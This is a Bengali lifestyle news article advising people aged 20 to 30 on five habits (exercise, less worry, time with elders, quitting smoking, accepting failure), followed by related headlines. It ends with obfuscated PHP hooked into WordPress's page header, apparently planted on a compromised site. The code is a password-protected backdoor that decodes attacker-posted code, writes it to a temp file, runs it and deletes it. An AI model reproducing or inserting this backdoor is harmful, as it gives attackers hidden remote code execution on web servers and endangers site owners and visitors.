শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

এখনই এই ৫টি কাজ না করলে পরে পস্তাবেন ২০ থেকে ৩০ বছর বয়সিরা

20-30লাইফস্টাইল ডেস্ক : ২০ থেকে ৩০ হল যৌবন ও তারুণ্যের সন্ধিলগ্ন। পরবর্তী জীবন কেমন হবে তা অনেকটাই নির্ভর করে এই ১০টা বছর কেমন কাটছে, তার ওপর। এই ১০টা বছরে যে ৫টি কাজ অবশ্যই করা উচিৎ সেগুলি এরকম—
এখনই না করলে পরে পস্তাবেন

১. স্বাস্থ্যচর্চা: স্বাস্থ্যই যে সম্পদ তা আর নতুন করে বলার অপেক্ষা রাখে না। কাজেই এই বয়সেই নিয়মিত শরীরচর্চা করার অভ্যাস গড়ে তুলুন।

২. ছোটখাটো বিষয় নিয়ে উদ্বিগ্ন হওয়ার অভ্যাস ছাড়ুন: প্ল্যানমাফিক কাজ করুন। অকারণে উদ্বেগ করবেন না। নয়তো সারাজীবনই উদ্বেগের সঙ্গে ঘর করতে হবে।

৩. পরিবারের বয়স্কদের সঙ্গে সময় কাটান: আপনার বয়স বাড়ার সঙ্গে সঙ্গে আপনি কিন্তু পরিবারের বয়স্ক মানুষদের হারাতে থাকবেন। কাজেই এই বয়সেই যতটা পারুন সময় কাটান দাদু-দিদিমা, ঠাকুরদা-ঠাকুরমার সঙ্গে।

৪. সিগারেট খাওয়ার অভ্যাস থাকলে তা ছেড়ে দিন: বয়সকালে হাঁপানির রোগে জরাজীর্ণ শরীর নিয়ে সিগারেট ছেড়ে আর কী লাভ? তার চেয়ে এই বয়সেই বরং ছেড়ে দিন সিগারেটটা।

৫. ব্যর্থতাকে সহজভাবে নেওয়ার মতো মানসিকতা গড়ে তুলুন: জীবনের সব ক্ষেত্রে আপনি সফল হতে পারবেন না, এই বোধ এই বয়সেই গড়ে তুলতে হবে। ব্যর্থতাকে সহজভাবে নিতে শেখা মানে কিন্তু সফল হওয়ার আশা ছেড়ে দেওয়া নয়, বরং পরাজয়ের গ্লানি কাটিয়ে নতুন উদ্যমে নিজেকে জয়ের জন্য প্রস্তুত করা। উৎস : এবেলা।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}